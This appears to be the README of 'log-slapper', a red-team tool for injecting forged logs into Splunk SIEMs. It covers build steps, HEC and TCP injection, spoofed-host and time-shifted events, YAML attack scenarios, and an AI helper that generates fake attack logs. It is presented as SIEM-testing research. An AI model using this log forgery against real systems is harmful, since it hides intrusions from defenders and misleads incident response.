We can inject fake logs, distract blueteams and hide our attacks thanks to the vulnerable SIEM solutions.
log-slapper is an offensive security tool designed to be used by red-teamers during the post-exploitation phase. It exploits vulnerable (any Splunk, basically) SIEM solutions and configurations that allow the injection of arbitrary logs into the target system.
log-slapper can:
- mimic attacks on behalf of any other computer on the network
- run in interactive mode: Target Shell Playzone
- send logs from future and past (time travelling!)
- perform HEC based attacks
- perform built-in attacks like login success/fail login, new process creation events spam in windows
- perform pre-determined attack scenarios using .yaml
To install log-slapper, you can directly compile the project using the go build . command. If you encounter any errors, follow the steps below to ensure all dependencies are installed:
# clone the Repository:
git clone https://github.com/oz9un/logslapper.git
cd logslapper
# install Dependencies:
sudo apt install libnetfilter-queue-dev
sudo apt install libpcap-dev
# build the project:
go build .After the first installation, log-slapper needs to create a log.settings file, as it won't be created automatically. This file requires the following information:
- Indexer/HF's IP Address: This is where the logs will be injected.
- HEC Token: Optional, in case you have a HEC token of the target instance.
You can manually enter those details. However, if you have root access, you can start log-slapper with `sudo`, and it will automatically find the target Splunk instance's IP address:
sudo ./logslapper
After that, you can select the attack type you want from the interactive menu.
Besides the interactive menu, you can also select various attack types from the help menu and ran them directly:
other attack types are explained in the help menu, but if you need more details, you can examine the slides or contact me directly.
log-slapper allows you to create custom attack scenarios, which can be collected in a single log file (using YAML format) and then provided as input to the tool. With this way, you can basically create any attack scenario in your mind and inject them into the target Splunk instance.
You can define your attack scenarios in a YAML file, where you can specify the logs, events, and sequences you want to simulate. Once your scenario is ready, save it as attack_template.yaml (or any name you prefer).
To execute log-slapper with your pre-determined attack scenario, use the following command:
./log-slapper attack -f attack_template.yaml
For the example attack_templates, have a look at the "example-attack-templates" folder.
There is also a custom chatgpt called "windows event genie", it's just created for to help you along creating windows attack scenarios. You can describe the attack you want to inject and it will create a .yaml for you:
This tool has been showcased at several security conferences, including:
- BsidesSATX
- BsidesTirana
- Hacktivity
- BsidesPrague
The latest and most powerful version of log-slapper, along with the comprehensive research behind it, is being presented at DEFCON 32 Red Team Village by Özgün Kültekin. This version includes enhanced features and capabilities, making it a must-have tool for any red team operation.
Now, DEFCON32 slides are publicly available! : The SIEMless Hack: Rewriting Reality with Log Injection
As with the premiere in Red Team Village @DEFCON32, log-slapper now includes the following functionalities:
- No Root Access Required: log-slapper no longer requires root access to inject logs, making it more versatile and easier to use in various environments.
- Direct TCP Communication: Logs can be injected to target indexer/hf using direct TCP communication. You don't even have to have Splunk installed on the compromised machine.
- Custom Attack Scenarios: Attackers can create their own attack scenarios and provide them as input to log-slapper. The tool can follow these pre-determined attack scenarios, allowing for more precise and controlled testing of SIEM solutions.